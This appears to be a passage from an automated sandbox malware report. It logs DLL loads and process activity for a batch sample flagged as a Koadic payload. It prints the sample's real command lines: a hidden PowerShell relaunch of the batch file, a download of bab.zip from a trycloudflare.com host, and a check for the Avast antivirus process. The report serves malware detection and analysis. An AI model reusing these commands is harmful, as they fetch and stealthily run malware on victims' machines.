Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll

Source: C:\Windows\System32\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: <p>The <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> class constructor has a new optional <em>readrc</em> argument source: 3.6.html.24.dr
Source:	Binary string: <td><p>Install debugging symbols (<code class="docutils literal notranslate"><span class="pre">*.pdb</span></code>)</p></td> source: windows.html2.24.dr
Source:	Binary string: <li><a href="library/pdb.html#pdb.Pdb.run">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
Source:	Binary string: .pdbrc source: genindex-all.html.24.dr
Source:	Binary string: <li><a href="library/pdb.html#index-1">Pdb (class in pdb)</a>, <a href="library/pdb.html#pdb.Pdb">[1]</a> source: genindex-all.html.24.dr
Source:	Binary string: <li><a href="library/pdb.html#pdb.Pdb.set_trace">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
Source:	Binary string: <li><a href="library/pdb.html#pdb.Pdb.runeval">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
Source:	Binary string: <p>On Windows now <a class="reference internal" href="../library/pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">Pdb</span></code></a> supports <code class="docutils literal notranslate"><span class="pre">~/.pdbrc</span></code>. source: 3.9.html.24.dr
Source:	Binary string: <li><a href="library/pdb.html#pdb.Pdb.runcall">(pdb.Pdb method)</a> source: genindex-all.html.24.dr
Source:	Binary string: <li><a href="library/pdb.html#index-2">.pdbrc</a> source: genindex-all.html.24.dr
Source:	Binary string: to control whether <code class="docutils literal notranslate"><span class="pre">.pdbrc</span></code> files should be read.</p> source: 3.6.html.24.dr

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\yap.bat\" hidden' -WindowStyle Hidden"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://german-tan-exotic-collectibles.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"	Jump to behavior

Yara detected Koadic BAT payload

Source: Yara match	File source: yap.bat, type: SAMPLE
Source: Yara match	File source: 00000005.00000003.1243785632.0000023995B58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2455424741.0000023995AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 2944, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 13_2_00007FF88A6300BD pushad ; iretd

13_2_00007FF88A6300C1

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
